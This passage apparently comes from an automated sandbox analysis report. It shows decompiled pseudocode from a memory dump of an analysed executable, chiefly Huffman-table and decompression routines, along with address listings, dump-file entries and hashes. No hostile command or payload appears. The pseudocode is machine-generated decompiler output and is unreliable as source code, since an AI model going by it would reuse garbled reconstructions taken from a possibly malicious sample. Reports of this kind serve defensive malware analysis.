												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









              0x00406354
              0x00406354
              0x00406354
              0x00406354
              0x00406354
              0x00406358
              0x00000000
              0x00000000
              0x0040635e
              0x0040635e
              0x00406361
              0x00406364
              0x00406369
              0x0040636b
              0x0040636e
              0x00406371
              0x00406374
              0x00406374
              0x00406377
              0x00000000
              0x00000000
              0x00406379
              0x00406379
              0x0040637c
              0x00406381
              0x00406383
              0x00406386
              0x0040638c
              0x004060eb
              0x004060eb
              0x004060ee
              0x004060f4
              0x004060fa
              0x00406103
              0x00406109
              0x0040610c
              0x00406113
              0x00406118
              0x0040611e
              0x00406129
              0x00406129
              0x00406392
              0x00406392
              0x0040639c
              0x00000000
              0x00000000
              0x004063a2
              0x004063a2
              0x004063a6
              0x004063a9
              0x004063a9
              0x004063ad
              0x004063b3
              0x004063b3
              0x004063b6
              0x004063b9
              0x004063bf
              0x00000000
              0x00000000
              0x004063c1
              0x004063e3
              0x004063e3
              0x004063e6
              0x00000000
              0x00000000
              0x004063c3
              0x004063c7
              0x00000000
              0x00000000
              0x004063cd
              0x004063cd
              0x004063d0
              0x004063d3
              0x004063d8
              0x004063da
              0x004063dd
              0x004063e0
              0x004063e0
              0x004063e8
              0x004063e8
              0x004063ee
              0x004063f1
              0x004063f4
              0x004063f4
              0x004063fb
              0x004063ff
              0x00406403
              0x00406406
              0x00406409
              0x0040640f
              0x00406414
              0x00000000
              0x00000000
              0x00406416
              0x0040642a
              0x0040642a
              0x0040642e
              0x00000000
              0x00000000
              0x00406418
              0x0040641b
              0x0040641b
              0x00406422
              0x00406427
              0x00406427
              0x00406427
              0x00406430
              0x00406430
              0x00406433
              0x00406441
              0x00406447
              0x0040644c
              0x00406452
              0x00406458
              0x0040645e
              0x00406465
              0x00406479
              0x00406479
              0x00406a48
              0x00406a48
              0x00406a48
              0x00406a4d
              0x00000000
              0x00000000
              0x00406085
              0x00406085
              0x00000000
              0x00406680
              0x00406680
              0x00406684
              0x00406687
              0x0040668a
              0x0040668d
              0x00000000
              0x00000000
              0x00406693
              0x00406693
              0x004066b8
              0x004066b8
              0x004066b8
              0x004066ba
              0x00000000
              0x00000000
              0x00406698
              0x00406698
              0x0040669c
              0x00000000
              0x00000000
              0x004066a2
              0x004066a2
              0x004066a5
              0x004066a8
              0x004066ab
              0x004066ad
              0x004066af
              0x004066b2
              0x004066b5
              0x004066b5
              0x004066b5
              0x004066bc
              0x004066bc
              0x004066c4
              0x004066c7
              0x004066ca
              0x004066cd
              0x004066d1
              0x004066d4
              0x004066d6
              0x004066d9
              0x004066db
              0x004066ef
              0x004066ef
              0x004066f2
              0x0040670c
              0x0040670c
              0x0040670f
              0x00000000
              0x00000000
              0x00406715
              0x00406715
              0x00406718
              0x00000000
              0x00000000
              0x0040671e
              0x0040671e
              0x00000000
              0x0040671e
              0x004066f4
              0x004066f7
              0x004066fe
              0x00406701
              0x00000000
              0x00406701
              0x004066dd
              0x004066e1
              0x004066e4
              0x00000000
              0x00000000
              0x00406729
              0x00406729
              0x0040674e
              0x0040674e
              0x0040674e
              0x00406750
              0x00000000
              0x00000000
              0x0040672e
              0x0040672e
              0x00406732
              0x00000000
              0x00000000
              0x00406738
              0x00406738
              0x0040673b
              0x0040673e
              0x00406741
              0x00406743
              0x00406745
              0x00406748
              0x0040674b
              0x0040674b
              0x0040674b
              0x00406752
              0x0040675a
              0x0040675d
              0x00406760
              0x00406762
              0x00406765
              0x00406765
              0x00406767
              0x0040676b
              0x0040676e
              0x00406771
              0x00406774
              0x00000000
              0x00000000
              0x0040677a
              0x0040677a
              0x0040679f
              0x0040679f
              0x0040679f
              0x004067a1
              0x00000000
              0x00000000
              0x0040677f
              0x0040677f
              0x00406783
              0x00000000
              0x00000000
              0x00406789
              0x00406789
              0x0040678c
              0x0040678f
              0x00406792
              0x00406794
              0x00406796
              0x00406799
              0x0040679c
              0x0040679c
              0x0040679c
              0x004067a3
              0x004067a3
              0x004067ab
              0x004067ae
              0x004067b1
              0x004067b4
              0x004067b8
              0x004067bb
              0x004067bd
              0x004067c0
              0x004067c3
              0x004067dd
              0x004067dd
              0x004067e0
              0x00000000
              0x00000000
              0x004067e6
              0x004067e6
              0x004067e9
              0x004067f0
              0x00000000
              0x004067f0
              0x004067c5
              0x004067c8
              0x004067cf
              0x004067d2
              0x00000000
              0x00000000
              0x004067f8
              0x004067f8
              0x0040681d
              0x0040681d
              0x0040681d
              0x0040681f
              0x00000000
              0x00000000
              0x004067fd
              0x004067fd
              0x00406801
              0x00000000
              0x00000000
              0x00406807
              0x00406807
              0x0040680a
              0x0040680d
              0x00406810
              0x00406812
              0x00406814
              0x00406817
              0x0040681a
              0x0040681a
              0x0040681a
              0x00406821
              0x00406829
              0x0040682c
              0x0040682f
              0x00406831
              0x00406834
              0x00406834
              0x00406836
              0x00000000
              0x00000000
              0x0040683c
              0x0040683c
              0x0040683f
              0x00406844
              0x00406846
              0x0040684c
              0x0040684e
              0x00406863
              0x00406865
              0x00406865
              0x00406850
              0x00406856
              0x00406858
              0x0040685a
              0x0040685a
              0x00406867
              0x0040686b
              0x0040686e
              0x00406874
              0x00406874
              0x00406877
              0x00406877
              0x00406877
              0x00406879
              0x00000000
              0x00000000
              0x0040687f
              0x0040687f
              0x00406885
              0x00406887
              0x004068ac
              0x004068af
              0x004068b5
              0x004068ba
              0x004068c0
              0x004068c6
              0x004068c8
              0x004068cb
              0x004068d4
              0x004068da
              0x004068da
              0x004068cd
              0x004068cf
              0x004068d1
              0x004068d1
              0x004068dc
              0x004068e2
              0x004068e4
              0x004068e7
              0x004068e9
              0x004068ef
              0x004068f1
              0x004068f3
              0x004068f5
              0x004068f7
              0x004068fa
              0x00406903
              0x00406906
              0x00406906
              0x004068fc
              0x004068fc
              0x004068ff
              0x004068ff
              0x004068fa
              0x004068f1
              0x00406908
              0x0040690a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040690a
              0x00406889
              0x00406889
              0x0040688f
              0x00406895
              0x00406897
              0x00000000
              0x00000000
              0x00406899
              0x00406899
              0x0040689b
              0x0040689d
              0x004068a6
              0x004068a6
              0x0040689f
              0x0040689f
              0x004068a2
              0x004068a2
              0x004068a8
              0x004068aa
              0x00000000
              0x00000000
              0x00406910
              0x00406910
              0x00406915
              0x00406917
              0x00406918
              0x00406919
              0x0040691a
              0x00406920
              0x00406923
              0x00406926
              0x00406929
              0x0040692b
              0x00406931
              0x00406931
              0x00406934
              0x00406934
              0x00406934
              0x00406934
              0x0040693d
              0x00000000
              0x00000000
              0x00406942
              0x00406942
              0x00406945
              0x00406948
              0x0040694a
              0x004069e1
              0x004069e1
              0x004069e4
              0x004069e6
              0x004069e7
              0x004069e8
              0x004069eb
              0x00000000
              0x004069eb
              0x00406950
              0x00406950
              0x00406956
              0x00406958
              0x0040697d
              0x00406980
              0x00406986
              0x0040698b
              0x00406991
              0x00406997
              0x00406999
              0x0040699c
              0x004069a5
              0x004069ab
              0x004069ab
              0x0040699e
              0x004069a0
              0x004069a2
              0x004069a2
              0x004069ad
              0x004069b3
              0x004069b5
              0x004069b8
              0x004069ba
              0x004069c0
              0x004069c2
              0x004069c4
              0x004069c6
              0x004069c8
              0x004069cb
              0x004069d4
              0x004069d7
              0x004069d7
              0x004069cd
              0x004069cd
              0x004069d0
              0x004069d0
              0x004069cb
              0x004069c2
              0x004069d9
              0x004069db
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004069db
              0x0040695a
              0x0040695a
              0x00406960
              0x00406966
              0x00406968
              0x00000000
              0x00000000
              0x0040696a
              0x0040696a
              0x0040696c
              0x0040696e
              0x00406975
              0x00406975
              0x00406977
              0x00406970
              0x00406970
              0x00406972
              0x00406972
              0x00406979
              0x0040697b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004069f3
              0x004069f3
              0x004069f6
              0x004069f8
              0x004069fb
              0x004069fe
              0x004069fe
              0x004069fe
              0x004069fe
              0x00000000
              0x00000000
              0x00000000
              0x004060ac
              0x00406090
              0x00000000
              0x00406096
              0x00406099
              0x004060a3
              0x004060a6
              0x004060a9
              0x00000000
              0x004060a9
              0x00406090
              0x004060b4
              0x004060b7
              0x004060bb
              0x004060c5
              0x004060cf
              0x004060d2
              0x004060d8
              0x0040620c
              0x0040620e
              0x00406214
              0x00406217
              0x0040621a
              0x00000000
              0x0040621a
              0x004060de
              0x004060de
              0x004060df
              0x00406137
              0x00406137
              0x0040613e
              0x004061e4
              0x004061e4
              0x004061e9
              0x004061ec
              0x004061f1
              0x004061f4
              0x004061f9
              0x004061fc
              0x00406201
              0x00406204
              0x00406204
              0x00000000
              0x00406144
              0x00406144
              0x00406144
              0x00406144
              0x00406148
              0x00406148
              0x0040616a
              0x0040616d
              0x0040616f
              0x00406172
              0x00406177
              0x0040614d
              0x0040614d
              0x00406152
              0x00406154
              0x00406156
              0x0040615b
              0x00406161
              0x00406166
              0x00406168
              0x00406168
              0x0040615d
              0x0040615d
              0x0040615d
              0x0040615b
              0x00000000
              0x00406179
              0x004061a6
              0x004061ab
              0x004061ad
              0x004061ae
              0x004061b0
              0x004061b1
              0x004061b1
              0x004061b1
              0x004061d9
              0x004061de
              0x004061de
              0x00000000
              0x004061de
              0x00406177
              0x0040613e
              0x004060e1
              0x004060e1
              0x004060e2
              0x0040612c
              0x00000000
              0x0040612c
              0x004060e4
              0x004060e5
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406241
              0x00406241
              0x00406241
              0x00406244
              0x00000000
              0x00000000
              0x00406221
              0x00406221
              0x00406225
              0x00000000
              0x00000000
              0x0040622b
              0x0040622b
              0x0040622e
              0x00406231
              0x00406236
              0x00406238
              0x0040623b
              0x0040623e
              0x0040623e
              0x0040623e
              0x00406246
              0x00406246
              0x00406249
              0x0040624b
              0x00406250
              0x00406253
              0x00406255
              0x00406258
              0x00000000
              0x00000000
              0x0040625e
              0x0040625e
              0x00406260
              0x00000000
              0x00000000
              0x00406266
              0x00406266
              0x0040626a
              0x00000000
              0x00000000
              0x00406270
              0x00406270
              0x00406273
              0x00406275
              0x00406313
              0x00406313
              0x00406316
              0x00406318
              0x00406318
              0x0040631b
              0x0040631e
              0x00406320
              0x00406322
              0x00406324
              0x00406324
              0x0040632d
              0x00406332
              0x00406335
              0x00406338
              0x0040633b
              0x0040633e
              0x0040633e
              0x0040633e
              0x00406341
              0x00406347
              0x00406347
              0x0040634d
              0x0040634d
              0x0040634d
              0x00000000
              0x00406341
              0x0040627b
              0x0040627b
              0x00406281
              0x00406284
              0x00406286
              0x004062b1
              0x004062b4
              0x004062ba
              0x004062bf
              0x004062c5
              0x004062cb
              0x004062cd
              0x004062d0
              0x004062d9
              0x004062df
              0x004062df
              0x004062d2
              0x004062d4
              0x004062d6
              0x004062d6
              0x004062e1
              0x004062e7
              0x004062ea
              0x004062ec
              0x004062ee
              0x004062f4
              0x004062f6
              0x004062f8
              0x004062fb
              0x00406304
              0x00406304
              0x00406306
              0x004062fd
              0x004062fd
              0x00406300
              0x00406300
              0x00406308
              0x00406308
              0x004062f6
              0x0040630b
              0x0040630d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040630d
              0x00406288
              0x00406288
              0x0040628e
              0x00406294
              0x00406296
              0x00000000
              0x00000000
              0x00406298
              0x00406298
              0x0040629a
              0x0040629c
              0x0040629f
              0x004062a6
              0x004062a6
              0x004062a8
              0x004062a1
              0x004062a1
              0x004062a3
              0x004062a3
              0x004062aa
              0x004062ac
              0x004062af
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004063b3
              0x004063b6
              0x004063b9
              0x004063bf
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406596
              0x00406596
              0x00406596
              0x00406599
              0x0040659c
              0x0040659e
              0x004065a1
              0x004065a7
              0x004065ae
              0x004065b0
              0x00000000
              0x00000000
              0x00406484
              0x00406484
              0x004064ac
              0x004064ac
              0x004064ac
              0x004064ae
              0x00000000
              0x00000000
              0x0040648c
              0x0040648c
              0x00406490
              0x00000000
              0x00000000
              0x00406496
              0x00406496
              0x00406499
              0x0040649c
              0x0040649f
              0x004064a1
              0x004064a3
              0x004064a6
              0x004064a9
              0x004064a9
              0x004064a9
              0x004064b0
              0x004064b0
              0x004064b8
              0x004064bb
              0x004064c1
              0x004064c4
              0x004064c8
              0x004064cc
              0x004064cf
              0x004064d2
              0x004064ea
              0x004064ea
              0x004064ed
              0x004064fb
              0x004064fe
              0x004064ef
              0x004064ef
              0x004064f1
              0x004064f8
              0x004064f8
              0x00406527
              0x00406527
              0x00406527
              0x0040652a
              0x0040652c
              0x00000000
              0x00000000
              0x00406507
              0x00406507
              0x0040650b
              0x00000000
              0x00000000
              0x00406511
              0x00406511
              0x00406514
              0x00406517
              0x0040651a
              0x0040651c
              0x0040651e
              0x00406521
              0x00406524
              0x00406524
              0x00406524
              0x0040652e
              0x0040652e
              0x00406530
              0x00406532
              0x0040653d
              0x00406540
              0x00406543
              0x00406545
              0x00406547
              0x00406549
              0x0040654c
              0x0040654f
              0x00406554
              0x00406557
              0x0040655a
              0x0040655d
              0x00406564
              0x00406567
              0x00406569
              0x00000000
              0x00000000
              0x0040656f
              0x0040656f
              0x00406573
              0x00406584
              0x00406584
              0x00406584
              0x00406586
              0x00406586
              0x0040658a
              0x0040658a
              0x0040658a
              0x0040658c
              0x0040658d
              0x00406590
              0x00406590
              0x00406590
              0x00406593
              0x00000000
              0x00406593
              0x00406575
              0x00406575
              0x00406578
              0x00000000
              0x00000000
              0x0040657e
              0x0040657e
              0x00000000
              0x0040657e
              0x004064d4
              0x004064d4
              0x004064d6
              0x004064d8
              0x004064db
              0x004064de
              0x004064e2
              0x004064e2
              0x004065b6
              0x004065b6
              0x004065b9
              0x004065c0
              0x004065c4
              0x004065c6
              0x004065c9
              0x004065cc
              0x004065d1
              0x004065d4
              0x004065d6
              0x004065d7
              0x004065da
              0x004065e5
              0x004065e8
              0x004065ff
              0x00406604
              0x0040660b
              0x00406610
              0x00406614
              0x00406616
              0x00406616
              0x00406616
              0x00406619
              0x0040661b
              0x00000000
              0x00406621
              0x00406621
              0x00406625
              0x00406630
              0x00406643
              0x00406648
              0x0040664d
              0x0040664f
              0x00000000
              0x00000000
              0x00406655
              0x00406655
              0x00406658
              0x0040665a
              0x00406668
              0x00406668
              0x0040666b
              0x0040666b
              0x0040666e
              0x00406671
              0x00406674
              0x00406677
              0x0040667a
              0x0040667d
              0x00000000
              0x0040667d
              0x0040665c
              0x0040665c
              0x00406662
              0x00000000
              0x00000000
              0x00000000
              0x00406662
              0x00000000
              0x00000000
              0x00000000
              0x00406a01
              0x00406a01
              0x00406a07
              0x00406a0d
              0x00406a12
              0x00406a18
              0x00406a1e
              0x00406a20
              0x00406a23
              0x00406a2c
              0x00406a32
              0x00406a32
              0x00406a25
              0x00406a27
              0x00406a29
              0x00406a29
              0x00406a34
              0x00406a36
              0x00406a39
              0x00406a74
              0x00406a74
              0x00000000
              0x00406a3b
              0x00406a3b
              0x00406a3b
              0x00406a41
              0x00406a44
              0x00406a46
              0x00406a7b
              0x00406a7d
              0x00000000
              0x00406a7d
              0x00000000
              0x00406a46
              0x00000000
              0x00406085
              0x00406a53
              0x00000000
              0x00406a53
              0x00406467
              0x00406469
              0x00000000
              0x00000000
              0x0040646b
              0x0040646b
              0x0040646e
              0x00000000
              0x0040646e
              0x004063b3
              0x00406374
              0x00406a58
              0x00406a5b
              0x00406a5d
              0x00406a66
              0x00406a6c
              0x00000000

              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
              • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
              • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
              • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406B2B, Relevance: .3, Instructions: 300COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ceb8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ceb8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































              0x00406b36
              0x00406b3e
              0x00406b42
              0x00406b44
              0x00406b47
              0x00406b49
              0x00406b49
              0x00406b4b
              0x00406b52
              0x00406b54
              0x00406b54
              0x00406b5a
              0x00406b6f
              0x00406b77
              0x00406b79
              0x00406b7b
              0x00406b7e
              0x00406b7f
              0x00406b7f
              0x00406b85
              0x00000000
              0x00000000
              0x00406b87
              0x00406b8a
              0x00000000
              0x00000000
              0x00000000
              0x00406b8a
              0x00406b8e
              0x00406b91
              0x00406b93
              0x00406b93
              0x00406b96
              0x00406b9c
              0x00406b9d
              0x00000000
              0x00000000
              0x00000000
              0x00406b9d
              0x00406ba2
              0x00406ba5
              0x00406ba7
              0x00406ba7
              0x00406bad
              0x00406baf
              0x00406bc0
              0x00406bb3
              0x00406bb7
              0x00406e5c
              0x00000000
              0x00406e5c
              0x00406bbd
              0x00406bbe
              0x00406bbe
              0x00406bc6
              0x00406bc9
              0x00406bcd
              0x00406bcf
              0x00406bd1
              0x00406bd4
              0x00000000
              0x00000000
              0x00406bdc
              0x00406be2
              0x00406be4
              0x00406be6
              0x00406be7
              0x00406bfc
              0x00406bfc
              0x00406bff
              0x00406c01
              0x00406c01
              0x00406c03
              0x00406c08
              0x00406c0a
              0x00406c11
              0x00406c13
              0x00406c1b
              0x00406c1b
              0x00406c1d
              0x00406c1e
              0x00406c2d
              0x00406c31
              0x00406c35
              0x00406c38
              0x00406c3b
              0x00406c40
              0x00406c43
              0x00406c49
              0x00406c50
              0x00406c56
              0x00406e4f
              0x00406e4f
              0x00406e54
              0x00406e63
              0x00000000
              0x00000000
              0x00000000
              0x00406e54
              0x00406c63
              0x00406c66
              0x00406c69
              0x00406c6c
              0x00406c70
              0x00000000
              0x00000000
              0x00406c7b
              0x00406c7e
              0x00406c7f
              0x00406c81
              0x00406c87
              0x00406c8a
              0x00000000
              0x00000000
              0x00406c90
              0x00406c91
              0x00406c94
              0x00406c97
              0x00406c9a
              0x00406ca0
              0x00406ca2
              0x00406ca2
              0x00406caa
              0x00406cae
              0x00406cb3
              0x00406cd8
              0x00406cde
              0x00406ce0
              0x00406ce2
              0x00406ce5
              0x00406cee
              0x00000000
              0x00000000
              0x00406cb5
              0x00406cb5
              0x00406cbe
              0x00406cc2
              0x00000000
              0x00000000
              0x00406cd3
              0x00406cd3
              0x00406cd6
              0x00000000
              0x00000000
              0x00406cc6
              0x00406cc9
              0x00406ccb
              0x00406ccf
              0x00000000
              0x00000000
              0x00406cd1
              0x00406cd1
              0x00000000
              0x00406cd3
              0x00406cf7
              0x00406cfd
              0x00406d07
              0x00406d09
              0x00406d0e
              0x00406d10
              0x00406d46
              0x00406d12
              0x00406d12
              0x00406d15
              0x00406d18
              0x00406d22
              0x00406d25
              0x00406d2c
              0x00406d37
              0x00406d3e
              0x00406d3e
              0x00406d48
              0x00406d4b
              0x00406d4d
              0x00406d53
              0x00406d53
              0x00406d5c
              0x00406d5f
              0x00406d64
              0x00406d73
              0x00406d7b
              0x00406d80
              0x00406da4
              0x00406dac
              0x00406db0
              0x00406db6
              0x00406d82
              0x00406d90
              0x00406d93
              0x00406d99
              0x00406d99
              0x00406dba
              0x00406d75
              0x00406d75
              0x00406d75
              0x00406dcb
              0x00406dcf
              0x00406ddb
              0x00406dd6
              0x00406dd9
              0x00406dd9
              0x00406de3
              0x00406de8
              0x00406df0
              0x00406dec
              0x00406dee
              0x00406dee
              0x00406df6
              0x00406df8
              0x00406dff
              0x00406e09
              0x00406e13
              0x00406e2f
              0x00406e33
              0x00406c78
              0x00406c7e
              0x00406c7f
              0x00406c81
              0x00406c87
              0x00406c8a
              0x00000000
              0x00000000
              0x00000000
              0x00406c8a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406e15
              0x00406e15
              0x00406e15
              0x00406e1a
              0x00406e23
              0x00406e2c
              0x00000000
              0x00406e2c
              0x00406e39
              0x00406e39
